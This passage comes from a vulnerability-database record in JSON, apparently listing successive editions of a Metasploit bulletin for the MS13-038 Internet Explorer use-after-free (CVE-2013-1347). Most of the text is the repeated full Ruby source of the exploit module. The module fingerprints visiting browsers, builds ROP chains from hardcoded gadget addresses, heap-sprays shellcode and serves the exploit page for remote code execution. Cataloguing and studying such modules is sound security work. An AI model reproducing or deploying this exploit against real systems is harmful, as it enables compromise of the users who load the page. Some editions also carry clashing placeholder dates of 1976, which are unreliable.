send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-06T20:15:02", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-06T22:15:07", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-06T22:15:07"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-06T22:15:07", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-07T20:13:48", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-07T20:13:48"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-07T20:13:48", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-07T22:13:50", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-07T22:13:50"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-07T22:13:50", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-08T18:11:31", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-08T18:11:31"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, 